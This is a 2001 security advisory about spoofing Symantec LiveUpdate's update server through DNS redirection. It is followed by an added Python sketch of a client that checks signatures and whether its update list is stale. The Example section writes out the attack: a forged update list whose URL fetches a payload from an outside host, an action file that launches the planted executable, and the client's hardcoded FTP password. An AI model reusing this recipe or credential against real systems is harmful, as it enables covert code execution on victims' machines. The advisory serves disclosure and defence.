Hi all,

attached is an advisory regarding possible attacks on Symantec's LiveUpdate
1.4 and 1.6. It is also available via HTTP on
http://www.phenoelit.de/stuff/LiveUpdate.txt.

Regards,
FX

--
FX <fx@phenoelit.de>
Phenoelit (http://www.phenoelit.de)
Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815>

[ Authors ]
  FX <fx@phenoelit.de>
  DasIch <dasich@phenoelit.de>
  kim0 <kim0@phenoelit.de>
  Phenoelit Group (http://www.phenoelit.de)

[ Affected Products ]
  Symantec LiveUpdate 1.4
  Symantec LiveUpdate 1.6

[ Vendor communication ]
  09/22/2001  Symantec contacted via symsecurity@symantec.com
  09/24/2001  Symsecurity acknowledges email
  09/28/2001  Symsecurity response with detailed statements (see "Vendor
              Response" section)
  10/01/2001  Additional statements from Symsecurity
  10/03/2001  Coordination with Symsecurity regarding release
  Communication from Symsecurity stopped at this point in time.

[ Overview ]
LiveUpdate is a tool shipped with most Symantec products to download updates
from the Symantec update servers. It is included as part of the Norton
Antivirus package and several other products in the Symantec product line.

Version 1.4 of LiveUpdate (shipped with Norton Antivirus 5.x) can be used for
rapid deployment of hostile code (backdoors, trojan applications, viruses,
worms - if unknown to the NAV pattern file) and for remote penetration of
systems running LiveUpdate via redirection of the initial connection to a
server controlled by the attacker.

Version 1.6 of LiveUpdate (shipped with the latest Norton Antivirus 2001
package) does not allow for this type of attack, but it can be prevented from
downloading virus descriptions and product updates. It can also be used as
part of distributed denial of service attacks by the same attack as described
for version 1.4.

[ Description ]
When LiveUpdate 1.4 is started (either by hand or as a scheduled task), it
looks for the server update.symantec.com. An attacker can use one of several
attacks to return false information to the querying host, such as:

  - The attacker controls the DNS server and creates a master zone for
    symantec.com.
  - The attacker uses routing-based attacks to impersonate the DNS server.
  - The attacker uses DNS poisoning on the DNS server to return a false IP
    address.
  - The attacker uses layer 2 connection interception to impersonate the DNS
    server.
  - The attacker sends false DNS responses to the querying host.

When the host running LiveUpdate tries to connect to update.symantec.com via
FTP, it is actually connecting to the FTP server of the attacker's choice.
LiveUpdate will then try to retrieve the file livetri.zip located in the FTP
server directory /opt/content/onramp. This archive contains the file
LIVEUPDT.TRI, which holds a complete list of all Symantec product updates.
After LiveUpdate has received the file, it will compare the product versions
to the versions of the Symantec products installed on the host and check the
appropriate sequence numbers to see if an update is required. If an update is
required, LiveUpdate will retrieve the file specified, uncompress it (ZIP
format), and perform the actions described in the .dis file. This includes
the execution of downloaded executables. The reader might see by now how an
attacker can use this behavior in ways other than intended by Symantec.

LiveUpdate 1.6 follows the same procedure described above with one exception:
the actual downloaded update package is different. First, it is no longer a
classic ZIP archive but rather some type of Symantec data compression.
Additionally, the file contains "cryptographic signatures" of all update
files. It was not tested how strong the cryptographic implementation actually
is. This signature makes it virtually impossible to use LiveUpdate 1.6 as a
penetration tool. However, by specifying a large file location on the
Internet, a scheduled LiveUpdate session in a medium sized company will lead
to network degradation and outages due to the large amount of traffic
generated.

An item of interest is that version 1.6 does not use cryptographic signatures
to verify the initial list LIVEUPDT.TRI, even though it places signatures on
all other files.
By applying the attack described above and never changing the content of the
file, one can prevent any updates the victim host might require.

[ Example ]
An example attack was performed for LiveUpdate 1.4 by taking over a DNS
server and creating a master zone for symantec.com. A false address for the
FTP server update.symantec.com was then returned. This FTP server was
configured with the user 'cust-r2', which is used by LiveUpdate with the
password 'Alpc2p30'. It is not known if all LiveUpdate installations use the
same username and password - but it is not relevant.

The file /opt/content/onramp/livetri.zip contained a modified LIVEUPDT.TRI
file with the following content:

  [LiveUpdate]
  Legal=Copyright 1995-2000 (c) Symantec Corporation
  LastModified=20010920 05:58PM
  Type0=Updates
  Type1=Add-Ons
  Type2=Documentation

  [Mandatory0]
  Exclusive=FALSE
  ProductName=LiveUpdate
  Version=1.4
  Language=English
  ItemSeqName=LiveUpdateSeq
  ItemSeqData=20000508
  FileName=ihack.x86
  Size=624807
  ActionItem=noreboot.dis
  TypeName=Updates
  ItemName=LiveUpate 1.6
  ItemDetails=Hacks your computer using LiveUpdate
  Platform=x86
  AdminCompatible=FALSE
  URL=http://www.phenoelit.de/hackme.x86

While LiveUpdate 1.4 has a preference to use the FileName entry and try to
retrieve the file via FTP, 1.6 has a preference for the URL given. Since this
is a mandatory update for LiveUpdate itself, it will retrieve the file first
and then try to update itself.

The file ihack.x86 is actually a renamed ihack.zip file with the following
content:

  NOREBOOT.DIS
  LUUPDATE.EXE
  LUSETUP.EXE

LUUPDATE.EXE is the trojan/backdoor/whatever file the attacker wants the
system to execute. NOREBOOT.DIS is an INI-like file that contains the actions
LiveUpdate should perform when downloading of the file is complete.
It has the following content:

  UPDATE (TempDir\*.EXE, LiveUpdateDir, 0)
  LAUNCH (LiveUpdateDir, LUUPDATE.EXE, "", 0)
  DELAYDELETE (LiveUpdateDir, LUUPDATE.EXE)

LUSETUP.exe was part of a real update package we inspected and might be left
out - this was not tested. We just used the same file as LUUPDATE.exe and it
worked.

When the victim host triggered the update mechanism, it downloaded livetri.zip
and then ihack.x86. It then executed the application LUUPDATE.exe and told the
user that the update was successfully completed. Thank you.

[ Vendor Response ]
According to symsecurity@symantec.com, LiveUpdate 1.4 is no longer the
current version and every installation should be updated to version 1.6 by
now.

Regarding the redirection of the LiveUpdate client, Symantec stated:

  "This is, unfortunately, an underlying issue with the Internet
  infrastructure that we are well aware of but have limited control over
  other than with connection points over which we exercise authority."

As for the denial of service condition, the statement is:

  "The denial of service activity, while potentially possible under the
  scenarios you indicate below, would affect only a small percentage of our
  user base as any spoofing, redirection would be limited to a local
  Internet area/region."

[ Solution ]
The improvements Symantec introduced in LiveUpdate 1.6 and higher are
actually "best practice security". It would be advisable to update all
Symantec products using LiveUpdate to version 1.6. This, however, does not
prevent an attacker from using LiveUpdate as a denial of service tool or from
preventing system updates. Symantec should use the same cryptographic
signature method on the livetri.zip file and advise its customer base of the
fact that LiveUpdate 1.4 is highly insecure.

Beware! LiveUpdate 1.4 WILL NOT update itself to 1.6 as far as we are able to
determine. The latest LiveUpdate 1.6.x is available from the URL
http://www.symantec.com/techsupp/files/lu/lu.html

According to Symantec, the next version of LiveUpdate will further enhance
security. No statement about the nature of these enhancements was made.

[ end of file ]
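The following is an added example, written for this page and not part of the Phenoelit advisory or of Symantec's LiveUpdate code. It models the client logic the Description section lays out (parse the INI-style LIVEUPDT.TRI list, compare each item's ItemSeqData against the installed sequence number, decide what to fetch) and adds the two checks the Solution section asks for: the list must carry a valid signature before any entry in it is acted on, and a list whose LastModified stamp never advances is reported as possible update suppression rather than treated as "nothing new". The manifest text is constructed from the advisory's example; the hosts update.example.invalid, the file navdefs.x86, the Norton AntiVirus sequence numbers, the HMAC-SHA256 stand-in for a real public-key signature, and all function names are assumptions made for the example.

```python
import configparser
import hashlib
import hmac
from datetime import datetime
from urllib.parse import urlparse

# Constructed sample update list, modelled on the advisory's LIVEUPDT.TRI.
# Everything except update.symantec.com and /opt/content/onramp is made up.
MANIFEST = """\
[LiveUpdate]
Legal=Copyright 1995-2000 (c) Symantec Corporation
LastModified=20010920 05:58PM
Type0=Updates

[Mandatory0]
ProductName=LiveUpdate
Version=1.4
ItemSeqName=LiveUpdateSeq
ItemSeqData=20000508
FileName=ihack.x86
ActionItem=noreboot.dis
URL=http://update.example.invalid/ihack.x86

[Mandatory1]
ProductName=Norton AntiVirus
Version=5.0
ItemSeqName=NAVDefSeq
ItemSeqData=20010918
FileName=navdefs.x86
ActionItem=noreboot.dis
URL=http://update.symantec.com/opt/content/onramp/navdefs.x86
"""

# Stand-in for the client's copy of the vendor's verification key (assumption:
# a real deployment would verify a public-key signature, not an HMAC).
DEMO_KEY = b"constructed-demo-key"
VENDOR_HOSTS = {"update.symantec.com"}


def sign_manifest(text: str, key: bytes) -> str:
    """Stand-in signature: HMAC-SHA256 over the raw manifest text."""
    return hmac.new(key, text.encode("utf-8"), hashlib.sha256).hexdigest()


def verify_manifest(text: str, signature: str, key: bytes) -> bool:
    """Constant-time comparison so a forged tag cannot be guessed byte by byte."""
    return hmac.compare_digest(sign_manifest(text, key), signature)


def parse_manifest(text: str) -> dict:
    """Parse the INI-style list: a [LiveUpdate] header plus one section per item."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case (ItemSeqData, not itemseqdata)
    cp.read_string(text)
    stamp = datetime.strptime(cp["LiveUpdate"]["LastModified"], "%Y%m%d %I:%M%p")
    items = [dict(cp[name]) for name in cp.sections() if name != "LiveUpdate"]
    return {"last_modified": stamp, "items": items}


def evaluate_update_list(text, signature, key, installed_seq, last_seen, hosts=VENDOR_HOSTS):
    """Decide which items a hardened client would act on, and what it would flag.

    installed_seq: {ItemSeqName: sequence string} for the products on this host.
    last_seen:     LastModified stamp of the previously accepted list, or None.
    """
    if not verify_manifest(text, signature, key):
        # Unsigned or tampered list: act on nothing (the signature the advisory
        # says livetri.zip lacks).
        return {"trusted": False, "findings": ["update list signature invalid; list ignored"], "apply": []}
    manifest = parse_manifest(text)
    findings = []
    if last_seen is not None and manifest["last_modified"] <= last_seen:
        # A valid but stale list is how a replayed list keeps a host on old definitions.
        findings.append("LastModified has not advanced since the last run; possible update suppression")
    apply = []
    for item in manifest["items"]:
        product = item.get("ProductName", "?")
        offered = int(item["ItemSeqData"])
        installed = installed_seq.get(item["ItemSeqName"])
        if installed is not None and offered <= int(installed):
            continue  # same sequence-number comparison the advisory describes
        host = urlparse(item.get("URL", "")).hostname
        if host not in hosts:
            findings.append(f"{product}: update source {host!r} is not a vendor host; entry skipped")
            continue
        apply.append(product)
    return {"trusted": True, "findings": findings, "apply": apply}


if __name__ == "__main__":
    sig = sign_manifest(MANIFEST, DEMO_KEY)
    print(evaluate_update_list(MANIFEST, sig, DEMO_KEY, {"LiveUpdateSeq": "19991201"}, None))
    print(evaluate_update_list(MANIFEST.replace("20010918", "20010919"), sig, DEMO_KEY, {}, None))
```

Two design points matter here. The hostname check only catches a list that openly points elsewhere, as the advisory's example list does; it does nothing against the DNS redirection the advisory describes, where update.symantec.com itself resolves to the wrong host, so the signature over the list and over every package is the control that actually defeats redirection. The LastModified comparison does not prevent a signed list from being replayed, but it turns the "freeze" the advisory warns about into an alert on the client instead of silence.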